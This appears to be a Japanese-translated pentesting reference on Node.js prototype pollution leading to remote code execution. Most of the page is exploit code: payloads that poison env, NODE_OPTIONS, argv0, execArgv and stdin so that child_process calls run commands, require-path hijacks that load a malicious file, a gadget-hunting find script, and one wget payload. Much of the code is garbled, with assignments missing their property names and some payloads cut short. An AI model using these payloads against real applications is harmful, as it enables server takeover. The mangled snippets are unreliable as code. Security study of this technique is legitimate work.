Prototype Pollution to RCE

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const { execSync, fork } = require('child_process');

function isObject(obj) {
console.log(typeof obj);
return typeof obj === 'function' || typeof obj === 'object';

// Function vulnerable to prototype pollution
function merge(target, source) {
for (let key in source) {
if (isObject(target[key]) && isObject(source[key])) {
merge(target[key], source[key]);
} else {
target[key] = source[key];
return target;

function clone(target) {
return merge({}, target);

// Run prototype pollution with user input
// Check in the next sections what payload put here to execute arbitrary code

// Spawn process, this will call the gadget that poputales env variables
// Create an a_file.js file in the current dir: `echo a=2 > a_file.js`
var proc = fork('a_file.js');

PP2RCE via env vars

PP2RCEPrototype Pollution to RCE (リモートコード実行) を意味します。

この writeup によると、process is spawnedchild_process のいくつかのメソッド(forkspawn など)を使用して呼び出されると、新しい env vars を作成するためのプロトタイプ汚染ガジェットである normalizeSpawnArguments メソッドが呼び出されます:

//See code in

var env = options.env || process.env;
var envPairs = [];
let envKeys = [];
// Prototype values are intentionally included.
for (const key in env) {
ArrayPrototypePush(envKeys, key);
for (const key of envKeys) {
const value = env[key];
if (value !== undefined) {
ArrayPrototypePush(envPairs, `${key}=${value}`); // <-- Pollution

Check that code you can see it's possible en poison envPairs just by polluting the attribute .env.

ポイズニング __proto__

注意してください、child_process ライブラリの normalizeSpawnArguments 関数の動作により、プロセスのために 新しい環境変数を設定する ために何かを呼び出すとき、何かを汚染する だけで済みます。 例えば、__proto__.avar="valuevar" を実行すると、プロセスは avar という名前の変数を valuevar という値で生成します。

しかし、環境変数が最初のものであるためには.env 属性汚染する必要があり、(一部のメソッドでは)その変数が最初のものになります(攻撃を可能にします)。

だからこそ、次の攻撃では NODE_OPTIONS.env の中にないのです。

const { execSync, fork } = require('child_process');

// Manual Pollution
b = {}
b.__proto__.env = { "EVIL":"console.log(require('child_process').execSync('touch /tmp/pp2rce').toString())//"}
b.__proto__.NODE_OPTIONS = "--require /proc/self/environ"

// Trigger gadget
var proc = fork('./a_file.js');
// This should create the file /tmp/pp2rec

// Abusing the vulnerable code
USERINPUT = JSON.parse('{"__proto__": {"NODE_OPTIONS": "--require /proc/self/environ", "env": { "EVIL":"console.log(require(\\\"child_process\\\").execSync(\\\"touch /tmp/pp2rce\\\").toString())//"}}}')


var proc = fork('a_file.js');
// This should create the file /tmp/pp2rec


const { execSync, fork } = require('child_process');

// Manual Pollution
b = {}
b.constructor.prototype.env = { "EVIL":"console.log(require('child_process').execSync('touch /tmp/pp2rce2').toString())//"}
b.constructor.prototype.NODE_OPTIONS = "--require /proc/self/environ"

proc = fork('a_file.js');
// This should create the file /tmp/pp2rec2

// Abusing the vulnerable code
USERINPUT = JSON.parse('{"constructor": {"prototype": {"NODE_OPTIONS": "--require /proc/self/environ", "env": { "EVIL":"console.log(require(\\\"child_process\\\").execSync(\\\"touch /tmp/pp2rce2\\\").toString())//"}}}}')


var proc = fork('a_file.js');
// This should create the file /tmp/pp2rec2

PP2RCE via env vars + cmdline

前のものと似たペイロードがこの解説で提案されました。 主な違いは次のとおりです:

  • nodejs ペイロードをファイル/proc/self/environに保存する代わりに、**/proc/self/cmdline**のargv0に保存します。

  • その後、**NODE_OPTIONSを介してファイル/proc/self/environを要求する代わりに、/proc/self/cmdline**を要求します。

const { execSync, fork } = require('child_process');

// Manual Pollution
b = {}
b.__proto__.argv0 = "console.log(require('child_process').execSync('touch /tmp/pp2rce2').toString())//"
b.__proto__.NODE_OPTIONS = "--require /proc/self/cmdline"

// Trigger gadget
var proc = fork('./a_file.js');
// This should create the file /tmp/pp2rec2

// Abusing the vulnerable code
USERINPUT = JSON.parse('{"__proto__": {"NODE_OPTIONS": "--require /proc/self/cmdline", "argv0": "console.log(require(\\\"child_process\\\").execSync(\\\"touch /tmp/pp2rce2\\\").toString())//"}}')


var proc = fork('a_file.js');
// This should create the file /tmp/pp2rec



"__proto__": {


"__proto__": {

PP2RCE 脆弱性 child_process 関数

このセクションでは、child_process の各関数を分析してコードを実行し、その関数を強制的にコードを実行させる技術を使用できるかどうかを確認します:

exec の悪用
// environ trick - not working
// It's not possible to pollute the .env attr to create a first env var
// because options.env is null (not undefined)

// cmdline trick - working with small variation
// Working after kEmptyObject (fix)
const { exec } = require('child_process');
p = {} = "/proc/self/exe" //You need to make sure the node executable is executed
p.__proto__.argv0 = "console.log(require('child_process').execSync('touch /tmp/exec-cmdline').toString())//"
p.__proto__.NODE_OPTIONS = "--require /proc/self/cmdline"
var proc = exec('something');

// stdin trick - not working
// Not using stdin

// Windows
// Working after kEmptyObject (fix)
const { exec } = require('child_process');
p = {} = "\\\\\\C$\\Windows\\System32\\calc.exe"
var proc = exec('something');
execFile の悪用

```javascript // environ trick - not working // It's not possible to pollute the .en attr to create a first env var

// cmdline trick - working with a big requirement // Working after kEmptyObject (fix) const { execFile } = require('child_process'); p = {} = "/proc/self/exe" //You need to make sure the node executable is executed p.proto.argv0 = "console.log(require('child_process').execSync('touch /tmp/execFile-cmdline').toString())//" p.proto.NODE_OPTIONS = "--require /proc/self/cmdline" var proc = execFile('/usr/bin/node');

// stdin trick - not working // Not using stdin

// Windows - not working






<div data-gb-custom-block data-tag="code" data-overflow='wrap'>

// environ trick - working
// Working after kEmptyObject (fix)
const { fork } = require('child_process');
b = {}
b.__proto__.env = { "EVIL":"console.log(require('child_process').execSync('touch /tmp/fork-environ').toString())//"}
b.__proto__.NODE_OPTIONS = "--require /proc/self/environ"
var proc = fork('something');

// cmdline trick - working
// Working after kEmptyObject (fix)
const { fork } = require('child_process');
p = {}
p.__proto__.argv0 = "console.log(require('child_process').execSync('touch /tmp/fork-cmdline').toString())//"
p.__proto__.NODE_OPTIONS = "--require /proc/self/cmdline"
var proc = fork('something');

// stdin trick - not working
// Not using stdin

// execArgv trick - working
// Only the fork method has this attribute
// Working after kEmptyObject (fix)
const { fork } = require('child_process');
b = {}
b.__proto__.execPath = "/bin/sh"
b.__proto__.argv0 = "/bin/sh"
b.__proto__.execArgv = ["-c", "touch /tmp/fork-execArgv"]
var proc = fork('./a_file.js');

// Windows
// Working after kEmptyObject (fix)
const { fork } = require('child_process');
b = {}
b.__proto__.execPath = "\\\\\\C$\\Windows\\System32\\calc.exe"
var proc = fork('./a_file.js');
spawn の悪用
// environ trick - working with small variation (shell and argv0)
// NOT working after kEmptyObject (fix) without options
const { spawn } = require('child_process');
p = {}
// If in windows or mac you need to change the following params to the path of ndoe
p.__proto__.argv0 = "/proc/self/exe" //You need to make sure the node executable is executed = "/proc/self/exe" //You need to make sure the node executable is executed
p.__proto__.env = { "EVIL":"console.log(require('child_process').execSync('touch /tmp/spawn-environ').toString())//"}
p.__proto__.NODE_OPTIONS = "--require /proc/self/environ"
var proc = spawn('something');
//var proc = spawn('something',[],{"cwd":"/tmp"}); //To work after kEmptyObject (fix)

// cmdline trick - working with small variation (shell)
// NOT working after kEmptyObject (fix) without options
const { spawn } = require('child_process');
p = {} = "/proc/self/exe" //You need to make sure the node executable is executed
p.__proto__.argv0 = "console.log(require('child_process').execSync('touch /tmp/spawn-cmdline').toString())//"
p.__proto__.NODE_OPTIONS = "--require /proc/self/cmdline"
var proc = spawn('something');
//var proc = spawn('something',[],{"cwd":"/tmp"}); //To work after kEmptyObject (fix)

// stdin trick - not working
// Not using stdin

// Windows
// NOT working after require(fix) without options
const { spawn } = require('child_process');
p = {} = "\\\\\\C$\\Windows\\System32\\calc.exe"
var proc = spawn('something');
//var proc = spawn('something',[],{"cwd":"C:\\"}); //To work after kEmptyObject (fix)
execFileSync の悪用
// environ trick - working with small variation (shell and argv0)
// Working after kEmptyObject (fix)
const { execFileSync } = require('child_process');
p = {}
// If in windows or mac you need to change the following params to the path of ndoe
p.__proto__.argv0 = "/proc/self/exe" //You need to make sure the node executable is executed = "/proc/self/exe" //You need to make sure the node executable is executed
p.__proto__.env = { "EVIL":"console.log(require('child_process').execSync('touch /tmp/execFileSync-environ').toString())//"}
p.__proto__.NODE_OPTIONS = "--require /proc/self/environ"
var proc = execFileSync('something');

// cmdline trick - working with small variation (shell)
// Working after kEmptyObject (fix)
const { execFileSync } = require('child_process');
p = {} = "/proc/self/exe" //You need to make sure the node executable is executed
p.__proto__.argv0 = "console.log(require('child_process').execSync('touch /tmp/execFileSync-cmdline').toString())//"
p.__proto__.NODE_OPTIONS = "--require /proc/self/cmdline"
var proc = execFileSync('something');

// stdin trick - working
// Working after kEmptyObject (fix)
const { execFileSync } = require('child_process');
p = {}
p.__proto__.argv0 = "/usr/bin/vim" = "/usr/bin/vim"
p.__proto__.input = ':!{touch /tmp/execFileSync-stdin}\n'
var proc = execFileSync('something');

// Windows
// Working after kEmptyObject (fix)
const { execSync } = require('child_process');
p = {} = "\\\\\\C$\\Windows\\System32\\calc.exe"
p.__proto__.argv0 = "\\\\\\C$\\Windows\\System32\\calc.exe"
var proc = execSync('something');
execSync の悪用
// environ trick - working with small variation (shell and argv0)
// Working after kEmptyObject (fix)
const { execSync } = require('child_process');
p = {}
// If in windows or mac you need to change the following params to the path of ndoe
p.__proto__.argv0 = "/proc/self/exe" //You need to make sure the node executable is executed = "/proc/self/exe" //You need to make sure the node executable is executed
p.__proto__.env = { "EVIL":"console.log(require('child_process').execSync('touch /tmp/execSync-environ').toString())//"}
p.__proto__.NODE_OPTIONS = "--require /proc/self/environ"
var proc = execSync('something');

// cmdline trick - working with small variation (shell)
// Working after kEmptyObject (fix)
const { execSync } = require('child_process');
p = {} = "/proc/self/exe" //You need to make sure the node executable is executed
p.__proto__.argv0 = "console.log(require('child_process').execSync('touch /tmp/execSync-cmdline').toString())//"
p.__proto__.NODE_OPTIONS = "--require /proc/self/cmdline"
var proc = execSync('something');

// stdin trick - working
// Working after kEmptyObject (fix)
const { execSync } = require('child_process');
p = {}
p.__proto__.argv0 = "/usr/bin/vim" = "/usr/bin/vim"
p.__proto__.input = ':!{touch /tmp/execSync-stdin}\n'
var proc = execSync('something');

// Windows
// Working after kEmptyObject (fix)
const { execSync } = require('child_process');
p = {} = "\\\\\\C$\\Windows\\System32\\calc.exe"
var proc = execSync('something');
spawnSync の悪用
// environ trick - working with small variation (shell and argv0)
// NOT working after kEmptyObject (fix) without options
const { spawnSync } = require('child_process');
p = {}
// If in windows or mac you need to change the following params to the path of node
p.__proto__.argv0 = "/proc/self/exe" //You need to make sure the node executable is executed = "/proc/self/exe" //You need to make sure the node executable is executed
p.__proto__.env = { "EVIL":"console.log(require('child_process').execSync('touch /tmp/spawnSync-environ').toString())//"}
p.__proto__.NODE_OPTIONS = "--require /proc/self/environ"
var proc = spawnSync('something');
//var proc = spawnSync('something',[],{"cwd":"/tmp"}); //To work after kEmptyObject (fix)

// cmdline trick - working with small variation (shell)
// NOT working after kEmptyObject (fix) without options
const { spawnSync } = require('child_process');
p = {} = "/proc/self/exe" //You need to make sure the node executable is executed
p.__proto__.argv0 = "console.log(require('child_process').execSync('touch /tmp/spawnSync-cmdline').toString())//"
p.__proto__.NODE_OPTIONS = "--require /proc/self/cmdline"
var proc = spawnSync('something');
//var proc = spawnSync('something',[],{"cwd":"/tmp"}); //To work after kEmptyObject (fix)

// stdin trick - working
// NOT working after kEmptyObject (fix) without options
const { spawnSync } = require('child_process');
p = {}
p.__proto__.argv0 = "/usr/bin/vim" = "/usr/bin/vim"
p.__proto__.input = ':!{touch /tmp/spawnSync-stdin}\n'
var proc = spawnSync('something');
//var proc = spawnSync('something',[],{"cwd":"/tmp"}); //To work after kEmptyObject (fix)

// Windows
// NOT working after require(fix) without options
const { spawnSync } = require('child_process');
p = {} = "\\\\\\C$\\Windows\\System32\\calc.exe"
var proc = spawnSync('something');
//var proc = spawnSync('something',[],{"cwd":"C:\\"}); //To work after kEmptyObject (fix)


前の例では、ガジェットをトリガーする方法を見ましたが、spawn を呼び出す機能が 存在する 必要があります(何かを実行するために使用される child_process のすべてのメソッドがそれを呼び出します)。前の例ではそれが コードの一部 でしたが、コードが 呼び出していない 場合はどうでしょうか。


この 別の解説 では、ユーザーが require が実行されるファイルパスを制御できます。そのシナリオでは、攻撃者は システム内の .js ファイルを見つける だけで、インポートされたときにスポーンメソッドを 実行する ものです。 インポートされたときにスポーン関数を呼び出す一般的なファイルのいくつかの例は次のとおりです:

  • /path/to/npm/scripts/changelog.js

  • /opt/yarn-v1.22.19/preinstall.js

  • 以下にさらにファイルを見つける

次のシンプルなスクリプトは、パディングなしで child_process からの 呼び出し を検索します:

find / -name "*.js" -type f -exec grep -l "child_process" {} \; 2>/dev/null | while read file_path; do
grep --with-filename -nE "^[a-zA-Z].*(exec\(|execFile\(|fork\(|spawn\(|execFileSync\(|execSync\(|spawnSync\()" "$file_path" | grep -v "require(" | grep -v "function " | grep -v "util.deprecate" | sed -E 's/.{255,}.*//'
# Note that this way of finding child_process executions just importing might not find valid scripts as functions called in the root containing child_process calls won't be found.
  • node_modules/buffer/bin/download-node-tests.js:17:cp.execSync('rm -rf node/*.js', { cwd: path.join(__dirname, '../test') })

  • node_modules/buffer/bin/test.js:10:var node = cp.spawn('npm', ['run', 'test-node'], { stdio: 'inherit' })

  • node_modules/npm/scripts/changelog.js:16:const log = execSync(git log --reverse --pretty='format:%h %H%d %s (%aN)%n%b%n---%n' ${branch}...).toString().split(/\n/)

  • node_modules/detect-libc/bin/detect-libc.js:18:process.exit(spawnSync(process.argv[2], process.argv.slice(3), spawnOptions).status);

  • node_modules/jest-expo/bin/jest.js:26:const result = childProcess.spawnSync('node', jestWithArgs, { stdio: 'inherit' });

  • node_modules/buffer/bin/download-node-tests.js:17:cp.execSync('rm -rf node/*.js', { cwd: path.join(__dirname, '../test') })

  • node_modules/buffer/bin/test.js:10:var node = cp.spawn('npm', ['run', 'test-node'], { stdio: 'inherit' })

  • node_modules/runtypes/scripts/format.js:13:const npmBinPath = execSync('npm bin').toString().trim();

  • node_modules/node-pty/scripts/publish.js:31:const result = cp.spawn('npm', args, { stdio: 'inherit' });


前の技術はユーザーが requireされるファイルのパスを制御する必要があります。しかし、これは常に真ではありません。



  • システム内の.jsファイルを見つける。それがrequireされるとchild_processを使用して何かを実行します

  • 攻撃しているプラットフォームにファイルをアップロードできる場合、そのようなファイルをアップロードすることができます

  • パスを汚染して、.jsファイルのrequireロードを強制する。それがchild_processで何かを実行します

  • 環境/コマンドラインを汚染して、child_process実行関数が呼び出されたときに任意のコードを実行します(最初の技術を参照)



// Create a file called malicious.js in /tmp
// Contents of malicious.js in the other tab

// Install package bytes (it doesn't have a main in package.json)
// npm install bytes

// Manual Pollution
b = {}
b.__proto__.main = "/tmp/malicious.js"

// Trigger gadget
var proc = require('bytes');
// This should execute the file /tmp/malicious.js
// The relative path doesn't even need to exist

// Abusing the vulnerable code
USERINPUT = JSON.parse('{"__proto__": {"main": "/tmp/malicious.js", "NODE_OPTIONS": "--require /proc/self/cmdline", "argv0": "console.log(require(\\\"child_process\\\").execSync(\\\"touch /tmp/pp2rce_absolute\\\").toString())//"}}')


var proc = require('bytes');
// This should execute the file /tmp/malicious.js wich create the file /tmp/pp2rec

相対require - 1


// Create a file called malicious.js in /tmp
// Contents of malicious.js in the other tab

// Manual Pollution
b = {}
b.__proto__.exports = { ".": "./malicious.js" }
b.__proto__["1"] = "/tmp"

// Trigger gadget
var proc = require('./relative_path.js');
// This should execute the file /tmp/malicious.js
// The relative path doesn't even need to exist

// Abusing the vulnerable code
USERINPUT = JSON.parse('{"__proto__": {"exports": {".": "./malicious.js"}, "1": "/tmp", "NODE_OPTIONS": "--require /proc/self/cmdline", "argv0": "console.log(require(\\\"child_process\\\").execSync(\\\"touch /tmp/pp2rce_exports_1\\\").toString())//"}}')


var proc = require('./relative_path.js');
// This should execute the file /tmp/malicious.js wich create the file /tmp/pp2rec

相対的なrequire - 2

// Create a file called malicious.js in /tmp
// Contents of malicious.js in the other tab

// Manual Pollution
b = {} = {} = { ".": "./malicious.js" }
b.__proto__.path = "/tmp" = "./relative_path.js" //This needs to be the relative path that will be imported in the require

// Trigger gadget
var proc = require('./relative_path.js');
// This should execute the file /tmp/malicious.js
// The relative path doesn't even need to exist

// Abusing the vulnerable code
USERINPUT = JSON.parse('{"__proto__": {"data": {"exports": {".": "./malicious.js"}}, "path": "/tmp", "name": "./relative_path.js", "NODE_OPTIONS": "--require /proc/self/cmdline", "argv0": "console.log(require(\\\"child_process\\\").execSync(\\\"touch /tmp/pp2rce_exports_path\\\").toString())//"}}')


var proc = require('./relative_path.js');
// This should execute the file /tmp/malicious.js wich create the file /tmp/pp2rec

Relative require - 3


// Requiring /opt/yarn-v1.22.19/preinstall.js
Object.prototype["data"] = {
exports: {
".": "./preinstall.js"
name: './usage'
Object.prototype["path"] = '/opt/yarn-v1.22.19' = "node"
Object.prototype["npm_config_global"] = 1
Object.prototype.env = {
"NODE_DEBUG": "console.log(require('child_process').execSync('wget${IFS}').toString());process.exit()//",
"NODE_OPTIONS": "--require=/proc/self/environ"


VM Gadgets

論文では、vmライブラリのいくつかのメソッドからのcontextExtensionsの制御がガジェットとして使用できることも示されています。 しかし、前述のchild_processメソッドと同様に、最新バージョンでは修正されています。

Fixes & Unexpected protections


2022年6月、このコミットから、変数options{}の代わりに**kEmptyObjectです。これにより、RCEを取得するためにoptions属性に影響を与えるプロトタイプ汚染が防止されます。 少なくともv18.4.0からこの保護が実装されており、したがってspawnおよびspawnSyncエクスプロイト**は、(optionsが使用されていない場合)メソッドに影響を与えなくなりました!


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